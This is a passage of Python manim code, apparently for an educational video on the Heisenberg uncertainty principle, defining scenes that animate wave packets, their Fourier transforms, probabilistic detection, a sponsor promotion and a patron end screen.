self.camera_frame\n\n self.add(rect)\n self.play( \n Animation(self.de_broglie.backdrop, remover = 
True),\n FadeOut(self.de_broglie),\n Animation(self.einstein.backdrop, remover = True),\n FadeOut(self.einstein),\n )\n self.play(camera_frame.scale, 3, {\"about_point\" : 2*UP})\n self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)\n self.add(rect_movement)\n self.wait(3)\n\n def zoom_into_reference_frame():\n original_height = camera_frame.get_height()\n original_center = camera_frame.get_center()\n self.play(\n UpdateFromAlphaFunc(\n camera_frame, lambda c, a : c.set_height(\n interpolate(original_height, 0.95*rect.get_height(), a)\n ).move_to(\n interpolate(original_center, rect.get_center(), a)\n )\n ),\n ApplyMethod(self.k_tracker.shift, RIGHT)\n )\n self.play(MaintainPositionRelativeTo(\n camera_frame, rect,\n run_time = 6\n ))\n self.play(\n camera_frame.set_height, original_height,\n camera_frame.move_to, original_center,\n ApplyMethod(self.k_tracker.shift, LEFT)\n )\n\n zoom_into_reference_frame()\n self.wait()\n self.play(\n UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))\n )\n\n index = int(0.5*len(self.springs))\n weights = VGroup(self.weights[index], self.weights[index+4])\n flashes = list(map(self.get_peak_flash_anim, weights))\n weights.save_state()\n weights.set_fill(RED)\n self.add(*flashes)\n self.wait(5)\n\n rect.align_to(camera_frame, RIGHT)\n self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))\n\n randy = Randolph(mode = \"pondering\")\n randy.look(UP+RIGHT)\n de_broglie = ImageMobject(\"de_Broglie\")\n de_broglie.set_height(6)\n de_broglie.next_to(4*DOWN, DOWN)\n self.add(\n Mobject.add_updater(\n randy, lambda m : m.next_to(\n rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,\n ).look_at(weights)\n ),\n de_broglie\n )\n self.wait(2)\n\n zoom_into_reference_frame()\n self.wait(8)\n\n ###\n\n def get_peak_flash_anim(self, weight):\n mobject = Mobject() #Dummy\n mobject.last_y = 0\n mobject.last_dy = 0\n mobject.curr_anim = None\n mobject.curr_anim_time = 0\n mobject.time_since_last_flash = 0\n def update(mob, dt):\n mob.time_since_last_flash += dt\n point = weight.get_center()\n y = point[1]\n mob.dy = y - mob.last_y\n different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)\n if different_dy and mob.time_since_last_flash > 0.5:\n mob.curr_anim = Flash(\n VectorizedPoint(point),\n flash_radius = 0.5,\n line_length = 0.3,\n run_time = 0.2,\n )\n mob.submobjects = [mob.curr_anim.mobject]\n mob.time_since_last_flash = 0\n mob.last_y = float(y)\n mob.last_dy = float(mob.dy)\n ##\n if mob.curr_anim:\n mob.curr_anim_time += dt\n if mob.curr_anim_time > mob.curr_anim.run_time:\n mob.curr_anim = None\n mob.submobjects = []\n mob.curr_anim_time = 0\n return\n mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)\n\n return Mobject.add_updater(mobject, update)\n\nclass MinutPhysicsWrapper(Scene):\n def construct(self):\n logo = ImageMobject(\"minute_physics_logo\", invert = True)\n logo.to_corner(UP+LEFT)\n self.add(logo)\n\n title = OldTexText(\"Minute Physics on special relativity\")\n title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)\n\n screen_rect = ScreenRectangle()\n screen_rect.set_width(title.get_width() + LARGE_BUFF)\n screen_rect.next_to(title, DOWN)\n\n self.play(ShowCreation(screen_rect))\n self.play(Write(title))\n self.wait(2)\n\nclass WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):\n def construct(self):\n self.teacher_says(\n \"So! 
What does \\\\\\\\ the Fourier trade-off \\\\\\\\ tell us?\",\n target_mode = \"surprised\",\n bubble_config = {\"width\" : 4, \"height\" : 3}\n )\n self.play_student_changes(*[\"thinking\"]*3)\n self.wait(4)\n\nclass FourierTransformOfWaveFunction(Scene):\n CONFIG = {\n \"wave_stroke_width\" : 3,\n \"wave_color\" : BLUE,\n }\n def construct(self):\n self.show_wave_packet()\n self.take_fourier_transform()\n self.show_correlations_with_pure_frequencies()\n self.this_is_momentum()\n self.show_tradeoff()\n\n def setup(self):\n self.x0_tracker = ValueTracker(-3)\n self.k_tracker = ValueTracker(1)\n self.a_tracker = ExponentialValueTracker(0.5)\n\n def show_wave_packet(self):\n axes = Axes(\n x_min = 0, x_max = 12,\n y_min = -1, y_max = 1,\n y_axis_config = {\n \"tick_frequency\" : 0.5\n }\n )\n position_label = OldTexText(\"Position\")\n position_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(position_label)\n axes.center().to_edge(UP, buff = LARGE_BUFF)\n\n wave = self.get_wave(axes)\n wave_update_animation = UpdateFromFunc(\n wave, lambda w : Transform(w, self.get_wave(axes)).update(1)\n )\n\n self.add(axes, wave)\n self.play(\n self.x0_tracker.set_value, 5,\n wave_update_animation,\n run_time = 3,\n )\n self.wait()\n\n self.wave_function = wave.underlying_function\n self.wave_update_animation = wave_update_animation\n self.wave = wave\n self.axes = axes\n\n def take_fourier_transform(self):\n wave = self.wave\n wave_update_animation = self.wave_update_animation\n frequency_axes = Axes(\n x_min = 0, x_max = 3,\n x_axis_config = {\n \"unit_size\" : 4,\n \"tick_frequency\" : 0.25,\n \"numbers_with_elongated_ticks\" : [1, 2]\n },\n y_min = -0.15,\n y_max = 0.15,\n y_axis_config = {\n \"unit_size\" : 7.5,\n \"tick_frequency\" : 0.05,\n }\n )\n label = self.frequency_x_axis_label = OldTexText(\"Spatial frequency\")\n label.next_to(frequency_axes.x_axis.get_right(), UP)\n frequency_axes.add(label)\n frequency_axes.move_to(self.axes, LEFT)\n frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)\n label.shift_onto_screen()\n\n def get_wave_function_fourier_graph():\n return get_fourier_graph(\n frequency_axes, self.get_wave_func(),\n t_min = 0, t_max = 15,\n )\n fourier_graph = get_wave_function_fourier_graph()\n self.fourier_graph_update_animation = UpdateFromFunc(\n fourier_graph, lambda m : Transform(\n m, get_wave_function_fourier_graph()\n ).update(1)\n )\n\n wave_copy = wave.copy()\n wave_copy.generate_target()\n wave_copy.target.move_to(fourier_graph, LEFT)\n wave_copy.target.fade(1)\n fourier_graph.save_state()\n fourier_graph.move_to(wave, LEFT)\n fourier_graph.fade(1)\n\n arrow = Arrow(\n self.axes.coords_to_point(5, -1),\n frequency_axes.coords_to_point(1, 0.1),\n color = YELLOW,\n )\n fourier_label = OldTexText(\"Fourier Transform\")\n fourier_label.next_to(arrow.get_center(), RIGHT)\n\n self.play(ReplacementTransform(\n self.axes.copy(), frequency_axes\n ))\n self.play(\n MoveToTarget(wave_copy, remover = True),\n fourier_graph.restore,\n GrowArrow(arrow),\n Write(fourier_label, run_time = 1),\n )\n self.wait()\n\n self.frequency_axes = frequency_axes\n self.fourier_graph = fourier_graph\n self.fourier_label = VGroup(arrow, fourier_label)\n\n def show_correlations_with_pure_frequencies(self):\n frequency_axes = self.frequency_axes\n axes = self.axes\n\n sinusoid = axes.get_graph(\n lambda x : 0.5*np.cos(TAU*x),\n x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,\n )\n sinusoid.to_edge(UP, buff = SMALL_BUFF)\n\n v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)\n 
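# --- Illustrative aside (not part of the original scene code) -----------------
# take_fourier_transform above plots get_fourier_graph(frequency_axes,
# self.get_wave_func(), t_min=0, t_max=15), i.e. the magnitude of the wave
# packet's Fourier transform over that time window.  A minimal, self-contained
# numpy sketch of that computation (hypothetical helper, shown only for
# clarity and never called by the scene):
def _fourier_magnitude_sketch(func, t_min=0.0, t_max=15.0, n=1024):
    import numpy as np
    ts = np.linspace(t_min, t_max, n, endpoint=False)
    dt = ts[1] - ts[0]
    values = np.array([func(t) for t in ts])
    # Riemann-sum approximation of the continuous Fourier transform,
    # evaluated at the nonnegative FFT frequencies.
    spectrum = np.fft.rfft(values) * dt
    freqs = np.fft.rfftfreq(n, d=dt)
    return freqs, np.abs(spectrum)
# ------------------------------------------------------------------------------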
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)\n\n f_equals = OldTex(\"f = \")\n freq_decimal = DecimalNumber(1)\n freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)\n freq_label = VGroup(f_equals, freq_decimal)\n freq_label.next_to(\n v_line, UP, SMALL_BUFF, \n submobject_to_align = f_equals[0]\n )\n\n self.play(\n ShowCreation(sinusoid),\n ShowCreation(v_line),\n Write(freq_label, run_time = 1),\n FadeOut(self.fourier_label)\n )\n last_f = 1\n for f in 1.4, 0.7, 1:\n self.play(\n sinusoid.stretch,f/last_f, 0, \n {\"about_point\" : axes.coords_to_point(0, 0)},\n v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,\n MaintainPositionRelativeTo(freq_label, v_line),\n ChangeDecimalToValue(freq_decimal, f),\n run_time = 3,\n )\n last_f = f\n self.play(*list(map(FadeOut, [\n sinusoid, v_line, freq_label\n ])))\n\n def this_is_momentum(self):\n formula = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.set_color_by_tex_to_color_map({\n \"p\" : BLUE,\n \"xi\" : YELLOW,\n })\n formula.next_to(\n self.frequency_x_axis_label, UP\n )\n\n f_max = 0.12\n brace = Brace(Line(2*LEFT, 2*RIGHT), UP)\n brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)\n words = OldTexText(\"This wave \\\\\\\\ describes momentum\")\n words.next_to(brace, UP)\n\n self.play(Write(formula))\n self.wait()\n self.play(\n GrowFromCenter(brace),\n Write(words)\n )\n brace.add(words)\n for k in 2, 0.5, 1:\n self.play(\n self.k_tracker.set_value, k,\n self.wave_update_animation,\n self.fourier_graph_update_animation,\n UpdateFromFunc(\n brace, lambda b : b.move_to(\n self.frequency_axes.coords_to_point(\n self.k_tracker.get_value(),\n f_max,\n ),\n DOWN\n )\n ),\n run_time = 2\n )\n self.wait()\n self.play(*list(map(FadeOut, [brace, words, formula])))\n\n def show_tradeoff(self):\n for a in 5, 0.1, 0.01, 10, 0.5:\n self.play(\n ApplyMethod(\n self.a_tracker.set_value, a,\n run_time = 2\n ),\n self.wave_update_animation,\n self.fourier_graph_update_animation\n )\n self.wait()\n\n ##\n\n def get_wave_func(self):\n x0 = self.x0_tracker.get_value()\n k = self.k_tracker.get_value()\n a = self.a_tracker.get_value()\n A = a**(0.25)\n return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)\n\n def get_wave(self, axes):\n return axes.get_graph(\n self.get_wave_func(), \n color = self.wave_color,\n stroke_width = self.wave_stroke_width\n )\n\nclass DopplerComparisonTodos(TODOStub):\n CONFIG = {\n \"message\" : \"\"\"\n Insert some Doppler footage, \n insert some hanging spring scene,\n insert position-momentum Fourier trade-off\n \"\"\"\n }\n\nclass MusicalNote(AddingPureFrequencies):\n def construct(self):\n speaker = self.speaker = SVGMobject(file_name = \"speaker\")\n speaker.move_to(2*DOWN)\n randy = self.pi_creature\n\n axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -1.5, y_max = 1.5\n )\n axes.center().to_edge(UP)\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(time_label)\n\n graph = axes.get_graph(\n lambda x : op.mul(\n np.exp(-0.2*(x-4)**2),\n 0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),\n ),\n )\n graph.set_color(BLUE)\n v_line = DashedLine(ORIGIN, 0.5*UP)\n v_line_update = UpdateFromFunc(\n v_line, lambda l : l.put_start_and_end_on_with_projection(\n graph.get_points()[-1],\n axes.x_axis.number_to_point(\n axes.x_axis.point_to_number(graph.get_points()[-1])\n )\n )\n )\n\n self.add(speaker, axes)\n self.play(\n randy.change, \"pondering\",\n self.get_broadcast_animation(n_circles = 6, run_time = 5),\n 
self.get_broadcast_animation(n_circles = 12, run_time = 5),\n ShowCreation(graph, run_time = 5, rate_func=linear),\n v_line_update\n )\n self.wait(2)\n\nclass AskAboutUncertainty(TeacherStudentsScene):\n def construct(self):\n self.student_says(\n \"What does this have \\\\\\\\ to do with ``certainty''\",\n bubble_config = {\"direction\" : LEFT},\n index = 2\n )\n self.play(PiCreatureSays(\n self.students[0], \n \"What even are \\\\\\\\ these waves?\",\n target_mode = \"confused\"\n ))\n self.wait(2)\n\nclass ProbabalisticDetection(FourierTransformOfWaveFunction):\n CONFIG = {\n \"wave_stroke_width\" : 2,\n }\n def construct(self):\n self.setup_wave()\n self.detect_only_single_points()\n self.show_probability_distribution()\n self.show_concentration_of_the_wave()\n\n def setup_wave(self):\n axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -0.5, y_max = 1.5,\n y_axis_config = {\n \"unit_size\" : 1.5,\n \"tick_frequency\" : 0.25,\n }\n )\n axes.set_stroke(width = 2)\n axes.center()\n self.x0_tracker.set_value(5)\n self.k_tracker.set_value(1)\n self.a_tracker.set_value(0.2)\n wave = self.get_wave(axes)\n self.wave_update_animation = UpdateFromFunc(\n wave, lambda w : Transform(w, self.get_wave(axes)).update(1)\n )\n\n self.k_tracker.save_state()\n self.k_tracker.set_value(0)\n bell_curve = self.get_wave(axes)\n self.k_tracker.restore()\n bell_curve.set_stroke(width = 0)\n bell_curve.set_fill(BLUE, opacity = 0.5)\n squared_bell_curve = axes.get_graph(\n lambda x : bell_curve.underlying_function(x)**2\n ).match_style(bell_curve)\n\n self.set_variables_as_attrs(\n axes, wave, bell_curve, squared_bell_curve\n )\n\n def detect_only_single_points(self):\n particle = ProbabalisticDotCloud(\n n_copies = 100, \n fill_opacity = 0.05, \n time_per_change = 0.05,\n )\n particle.mobject[0].set_fill(BLUE, opacity = 1)\n gdw = particle.gaussian_distribution_wrapper\n\n rect = Rectangle(\n stroke_width = 0,\n height = 0.5,\n width = 2,\n )\n rect.set_fill(YELLOW, 0.3)\n rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))\n brace = Brace(rect, UP, buff = 0)\n question = OldTexText(\"Do we detect the particle \\\\\\\\ in this region?\")\n question.next_to(brace, UP)\n question.add_background_rectangle()\n rect.save_state()\n rect.stretch(0, 0)\n\n gdw_anim = Mobject.add_updater(\n gdw, lambda m : m.set_width(\n 2.0/(self.a_tracker.get_value()**(0.5))\n ).move_to(rect)\n )\n\n self.add(rect, brace, question)\n\n yes = OldTexText(\"Yes\").set_color(GREEN)\n no = OldTexText(\"No\").set_color(RED)\n for word in yes, no:\n word.next_to(rect, DOWN)\n # word.add_background_rectangle()\n answer = VGroup()\n def update_answer(answer):\n px = particle.mobject[0].get_center()[0]\n lx = rect.get_left()[0]\n rx = rect.get_right()[0]\n if lx < px < rx:\n answer.submobjects = [yes]\n else:\n answer.submobjects = [no]\n answer_anim = Mobject.add_updater(answer, update_answer)\n\n self.add(gdw_anim, particle)\n self.play(\n GrowFromCenter(brace),\n rect.restore,\n Write(question)\n )\n self.wait()\n self.add(answer_anim)\n self.wait(4)\n self.add_foreground_mobjects(answer, particle.mobject)\n\n self.question_group = VGroup(question, brace)\n self.particle = particle\n self.rect = rect\n\n def show_probability_distribution(self):\n axes = self.axes\n wave = self.wave\n bell_curve = self.bell_curve\n question_group = self.question_group\n gdw = self.particle.gaussian_distribution_wrapper\n rect = self.rect\n\n v_lines = VGroup(*[\n DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)\n for point in (rect.get_left(), 
rect.get_right())\n ])\n \n self.play(\n FadeIn(VGroup(axes, wave)),\n question_group.next_to, v_lines, UP, {\"buff\" : 0},\n *list(map(ShowCreation, v_lines))\n )\n self.wait(10)\n\n def show_concentration_of_the_wave(self):\n self.play(\n self.a_tracker.set_value, 5,\n self.wave_update_animation,\n )\n self.wait(10)\n\nclass HeisenbergCommentTodos(TODOStub):\n CONFIG = {\n \"message\" : \"Insert position-momentum trade-off\"\n }\n\nclass HeisenbergPetPeeve(PiCreatureScene):\n def construct(self):\n morty, other = self.pi_creatures\n particle = ProbabalisticDotCloud()\n gdw = particle.gaussian_distribution_wrapper\n gdw.to_edge(UP, buff = LARGE_BUFF)\n gdw.stretch_to_fit_width(3)\n gdw.rotate(3*DEGREES)\n\n self.add(particle)\n self.wait()\n self.play(PiCreatureSays(\n other, \"\"\"\n According to the H.U.P., the \\\\\\\\\n universe is unknowable!\n \"\"\",\n target_mode = \"speaking\"\n ))\n self.play(morty.change, \"angry\")\n self.wait(3)\n self.play(\n PiCreatureSays(\n morty, \"Well, yes and no\",\n target_mode = \"sassy\",\n ),\n RemovePiCreatureBubble(\n other, target_mode = \"erm\"\n )\n )\n self.wait(4)\n\n ###\n def create_pi_creatures(self):\n morty = Mortimer()\n morty.to_corner(DOWN+RIGHT)\n other = PiCreature(color = MAROON_E)\n other.to_edge(DOWN).shift(3*LEFT)\n return VGroup(morty, other)\n\nclass OneLevelDeeper(Scene):\n def construct(self):\n heisenberg = ImageMobject(\"Heisenberg\")\n heisenberg.to_corner(UP+LEFT)\n self.add(heisenberg)\n\n hup_words = OldTexText(\"Heisenberg's uncertainty principle\")\n wave_words = OldTexText(\"Interpretation of the wave function\")\n arrow = Vector(UP)\n group = VGroup(hup_words, arrow, wave_words)\n group.arrange(DOWN)\n\n randomness = ProbabalisticMobjectCloud(\n OldTexText(\"Randomness\"),\n n_copies = 5,\n time_per_change = 0.05\n )\n gdw = randomness.gaussian_distribution_wrapper\n gdw.rotate(TAU/4)\n gdw.set_height(1)\n # gdw.set_width(4)\n gdw.next_to(hup_words, UP, MED_LARGE_BUFF)\n\n self.add(hup_words, randomness)\n self.wait(4)\n self.play(\n FadeIn(wave_words),\n GrowArrow(arrow),\n ApplyMethod(\n gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,\n path_arc = TAU/2,\n )\n )\n self.wait(6)\n\nclass BetterTranslation(TeacherStudentsScene):\n def construct(self):\n english_term = OldTexText(\"Uncertainty principle\")\n german_word = OldTexText(\"Unschärferelation\")\n translation = OldTexText(\"Unsharpness relation\")\n\n to_german_words = OldTexText(\"In German\")\n to_german_words.scale(0.5)\n to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)\n to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)\n to_german_words.set_color(YELLOW)\n to_german_group = VGroup(to_german_arrow, to_german_words)\n\n translation_words = OldTexText(\"Literal translation\")\n translation_words.scale(0.5)\n translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)\n translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)\n translation_words.set_color(YELLOW)\n translation_group = VGroup(translation_arrow, translation_words)\n\n english_term.next_to(self.teacher, UP+LEFT)\n english_term.save_state()\n english_term.shift(DOWN)\n english_term.fade(1)\n self.play(\n english_term.restore,\n self.change_students(*[\"pondering\"]*3)\n )\n self.wait()\n\n german_word.move_to(english_term)\n to_german_group.next_to(\n german_word, UP,\n submobject_to_align = to_german_arrow\n )\n self.play(\n self.teacher.change, \"raise_right_hand\", \n english_term.next_to, to_german_arrow, UP\n )\n self.play(\n 
GrowArrow(to_german_arrow),\n FadeIn(to_german_words),\n ReplacementTransform(\n english_term.copy().fade(1),\n german_word\n )\n )\n self.wait(2)\n\n group = VGroup(english_term, to_german_group, german_word)\n translation.move_to(german_word)\n translation_group.next_to(\n german_word, UP,\n submobject_to_align = translation_arrow\n )\n self.play(\n group.next_to, translation_arrow, UP,\n )\n self.play(\n GrowArrow(translation_arrow),\n FadeIn(translation_words),\n ReplacementTransform(\n german_word.copy().fade(1),\n translation\n )\n )\n self.play_student_changes(*[\"happy\"]*3)\n self.wait(2)\n\nclass ThinkOfHeisenbergUncertainty(PiCreatureScene):\n def construct(self):\n morty = self.pi_creature\n morty.center().to_edge(DOWN).shift(LEFT)\n\n dot_cloud = ProbabalisticDotCloud()\n dot_gdw = dot_cloud.gaussian_distribution_wrapper\n dot_gdw.set_width(1)\n dot_gdw.rotate(TAU/8)\n dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2),\n\n vector_cloud = ProbabalisticVectorCloud(\n center_func = dot_gdw.get_center\n )\n vector_gdw = vector_cloud.gaussian_distribution_wrapper\n vector_gdw.set_width(0.1)\n vector_gdw.rotate(TAU/8)\n vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)\n\n time_tracker = ValueTracker(0)\n self.add()\n freq = 1\n continual_anims = [\n always_shift(time_tracker, direction = RIGHT, rate = 1),\n Mobject.add_updater(\n dot_gdw,\n lambda d : d.set_width(\n (np.cos(freq*time_tracker.get_value()) + 1.1)/2\n )\n ),\n Mobject.add_updater(\n vector_gdw,\n lambda d : d.set_width(\n (-np.cos(freq*time_tracker.get_value()) + 1.1)/2\n )\n ),\n dot_cloud, vector_cloud\n ]\n self.add(*continual_anims)\n\n position, momentum, time, frequency = list(map(TexText, [\n \"Position\", \"Momentum\", \"Time\", \"Frequency\"\n ]))\n VGroup(position, time).set_color(BLUE)\n VGroup(momentum, frequency).set_color(YELLOW)\n groups = VGroup()\n for m1, m2 in (position, momentum), (time, frequency):\n arrow = OldTex(\"\\\\updownarrow\").scale(1.5)\n group = VGroup(m1, arrow, m2)\n group.arrange(DOWN)\n lp, rp = parens = OldTex(\"\\\\big(\\\\big)\")\n parens.stretch(1.5, 1)\n parens.match_height(group)\n lp.next_to(group, LEFT, buff = SMALL_BUFF)\n rp.next_to(group, RIGHT, buff = SMALL_BUFF)\n group.add(parens)\n groups.add(group)\n arrow = OldTex(\"\\\\Leftrightarrow\").scale(2)\n groups.submobjects.insert(1, arrow)\n groups.arrange(RIGHT)\n groups.next_to(morty, UP+RIGHT, LARGE_BUFF)\n groups.shift_onto_screen()\n\n\n self.play(PiCreatureBubbleIntroduction(\n morty, \"Heisenberg \\\\\\\\ uncertainty \\\\\\\\ principle\",\n bubble_type = ThoughtBubble,\n bubble_config = {\"height\" : 4, \"width\" : 4, \"direction\" : RIGHT},\n target_mode = \"pondering\"\n ))\n self.wait()\n self.play(morty.change, \"confused\", dot_gdw)\n self.wait(10)\n self.play(\n ApplyMethod(\n VGroup(dot_gdw, vector_gdw ).shift, \n FRAME_X_RADIUS*RIGHT,\n rate_func = running_start\n )\n )\n self.remove(*continual_anims)\n self.play(\n morty.change, \"raise_left_hand\", groups,\n FadeIn(\n groups, \n lag_ratio = 0.5,\n run_time = 3,\n )\n )\n self.wait(2)\n\n# End things\n\nclass PatreonMention(PatreonThanks):\n def construct(self):\n morty = Mortimer()\n morty.next_to(ORIGIN, DOWN)\n\n patreon_logo = PatreonLogo()\n patreon_logo.to_edge(UP)\n\n thank_you = OldTexText(\"Thank you.\")\n thank_you.next_to(patreon_logo, DOWN)\n\n self.play(\n DrawBorderThenFill(patreon_logo),\n morty.change, \"gracious\"\n )\n self.play(Write(thank_you))\n self.wait(3)\n\nclass Promotion(PiCreatureScene):\n CONFIG = {\n \"camera_class\" : ThreeDCamera,\n 
\"seconds_to_blink\" : 5,\n }\n def construct(self):\n aops_logo = AoPSLogo()\n aops_logo.next_to(self.pi_creature, UP+LEFT)\n url = OldTexText(\n \"AoPS.com/\", \"3b1b\",\n arg_separator = \"\"\n )\n url.to_corner(UP+LEFT)\n url_rect = Rectangle(color = BLUE)\n url_rect.replace(\n url.get_part_by_tex(\"3b1b\"),\n stretch = True\n )\n\n url_rect.stretch_in_place(1.1, dim = 1)\n\n rect = Rectangle(height = 9, width = 16)\n rect.set_height(4.5)\n rect.next_to(url, DOWN)\n rect.to_edge(LEFT)\n rect.set_stroke(width = 0)\n mathy = Mathematician()\n mathy.flip()\n mathy.to_corner(DOWN+RIGHT)\n morty = self.pi_creature\n morty.save_state()\n book = ImageMobject(\"AoPS_volume_2\")\n book.set_height(2)\n book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)\n mathy.get_center = mathy.get_top\n\n words = OldTexText(\"\"\"\n Interested in working for \\\\\\\\ \n one of my favorite math\\\\\\\\ \n education companies?\n \"\"\", alignment = \"\")\n words.to_edge(UP)\n\n arrow = Arrow(\n aops_logo.get_top(),\n morty.get_top(),\n path_arc = -0.4*TAU,\n stroke_width = 5,\n tip_length = 0.5,\n )\n arrow.tip.shift(SMALL_BUFF*DOWN)\n\n self.add(words)\n self.play(\n self.pi_creature.change_mode, \"raise_right_hand\",\n *[\n DrawBorderThenFill(\n submob,\n run_time = 2,\n rate_func = squish_rate_func(double_smooth, a, a+0.5)\n )\n for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))\n ]\n )\n self.play(\n words.scale, 0.75,\n words.next_to, url, DOWN, LARGE_BUFF,\n words.shift_onto_screen,\n Write(url),\n )\n self.wait(2)\n self.play(\n LaggedStartMap(\n ApplyFunction, aops_logo,\n lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),\n rate_func = there_and_back, \n run_time = 1,\n ),\n morty.change, \"thinking\"\n )\n self.wait()\n self.play(ShowCreation(arrow))\n self.play(FadeOut(arrow))\n self.wait()\n\n # To teacher\n self.play(\n morty.change_mode, \"plain\",\n morty.flip,\n morty.scale, 0.7,\n morty.next_to, mathy, LEFT, LARGE_BUFF,\n morty.to_edge, DOWN,\n FadeIn(mathy),\n )\n self.play(\n PiCreatureSays(\n mathy, \"\",\n bubble_config = {\"width\" : 5},\n look_at = morty.eyes,\n ),\n morty.change, \"happy\",\n aops_logo.shift, 1.5*UP + 0.5*RIGHT\n )\n self.play(Blink(mathy))\n self.wait()\n self.play(\n RemovePiCreatureBubble(\n mathy, target_mode = \"raise_right_hand\"\n ),\n aops_logo.to_corner, UP+RIGHT,\n aops_logo.shift, MED_SMALL_BUFF*DOWN,\n GrowFromPoint(book, mathy.get_corner(UP+LEFT)),\n )\n self.play(morty.change, \"pondering\", book)\n self.wait(3)\n self.play(Blink(mathy))\n self.wait()\n self.play(\n Animation(\n BackgroundRectangle(book, fill_opacity = 1),\n remover = True\n ),\n FadeOut(book),\n )\n print(self.num_plays)\n self.play(\n FadeOut(words),\n ShowCreation(rect),\n morty.restore,\n morty.change, \"happy\", rect,\n FadeOut(mathy),\n )\n self.wait(10)\n self.play(ShowCreation(url_rect))\n self.play(\n FadeOut(url_rect),\n url.get_part_by_tex(\"3b1b\").set_color, BLUE,\n )\n self.wait(15)\n\nclass PuzzleStatement(Scene):\n def construct(self):\n aops_logo = AoPSLogo()\n url = OldTexText(\"AoPS.com/3b1b\")\n url.next_to(aops_logo, UP)\n group = VGroup(aops_logo, url)\n group.to_edge(UP)\n self.add(group)\n\n words = OldTexText(\"\"\"\n AoPS must choose one of 20 people to send to a \n tug-of-war tournament. We don't care who we send, \n as long as we don't send our weakest person. \\\\\\\\ \\\\\\\\\n\n Each person has a different strength, but we don't know \n those strengths. We get 10 intramural 10-on-10 matches \n to determine who we send. 
Can we make sure we don't send\n the weakest person?\n \"\"\", alignment = \"\")\n words.set_width(FRAME_WIDTH - 2)\n words.next_to(group, DOWN, LARGE_BUFF)\n self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))\n self.wait(2)\n\nclass UncertaintyEndScreen(PatreonEndScreen):\n CONFIG = {\n \"specific_patrons\" : [\n \"CrypticSwarm\",\n \"Ali Yahya\",\n \"Juan Benet\",\n \"Markus Persson\",\n \"Damion Kistler\",\n \"Burt Humburg\",\n \"Yu Jun\",\n \"Dave Nicponski\",\n \"Kaustuv DeBiswas\",\n \"Joseph John Cox\",\n \"Luc Ritchie\",\n \"Achille Brighton\",\n \"Rish Kundalia\",\n \"Yana Chernobilsky\",\n \"Shìmín Kuang\",\n \"Mathew Bramson\",\n \"Jerry Ling\",\n \"Mustafa Mahdi\",\n \"Meshal Alshammari\",\n \"Mayank M. Mehrotra\",\n \"Lukas Biewald\",\n \"Robert Teed\",\n \"Samantha D. Suplee\",\n \"Mark Govea\",\n \"John Haley\",\n \"Julian Pulgarin\",\n \"Jeff Linse\",\n \"Cooper Jones\",\n \"Desmos \",\n \"Boris Veselinovich\",\n \"Ryan Dahl\",\n \"Ripta Pasay\",\n \"Eric Lavault\",\n \"Randall Hunt\",\n \"Andrew Busey\",\n \"Mads Elvheim\",\n \"Tianyu Ge\",\n \"Awoo\",\n \"Dr. David G. Stork\",\n \"Linh Tran\",\n \"Jason Hise\",\n \"Bernd Sing\",\n \"James H. Park\",\n \"Ankalagon \",\n \"Mathias Jansson\",\n \"David Clark\",\n \"Ted Suzman\",\n \"Eric Chow\",\n \"Michael Gardner\",\n \"David Kedmey\",\n \"Jonathan Eppele\",\n \"Clark Gaebel\",\n \"Jordan Scales\",\n \"Ryan Atallah\",\n \"supershabam \",\n \"1stViewMaths\",\n \"Jacob Magnuson\",\n \"Chloe Zhou\",\n \"Ross Garber\",\n \"Thomas Tarler\",\n \"Isak Hietala\",\n \"Egor Gumenuk\",\n \"Waleed Hamied\",\n \"Oliver Steele\",\n \"Yaw Etse\",\n \"David B\",\n \"Delton Ding\",\n \"James Thornton\",\n \"Felix Tripier\",\n \"Arthur Zey\",\n \"George Chiesa\",\n \"Norton Wang\",\n \"Kevin Le\",\n \"Alexander Feldman\",\n \"David MacCumber\",\n \"Jacob Kohl\",\n \"Frank Secilia\",\n \"George John\",\n \"Akash Kumar\",\n \"Britt Selvitelle\",\n \"Jonathan Wilson\",\n \"Michael Kunze\",\n \"Giovanni Filippi\",\n \"Eric Younge\",\n \"Prasant Jagannath\",\n \"Andrejs olins\",\n \"Cody Brocious\",\n ],\n }\n\nclass Thumbnail(Scene):\n def construct(self):\n uncertainty_principle = OldTexText(\"Uncertainty \\\\\\\\\", \"principle\")\n uncertainty_principle[1].shift(SMALL_BUFF*UP)\n quantum = OldTexText(\"Quantum\")\n VGroup(uncertainty_principle, quantum).scale(2.5)\n 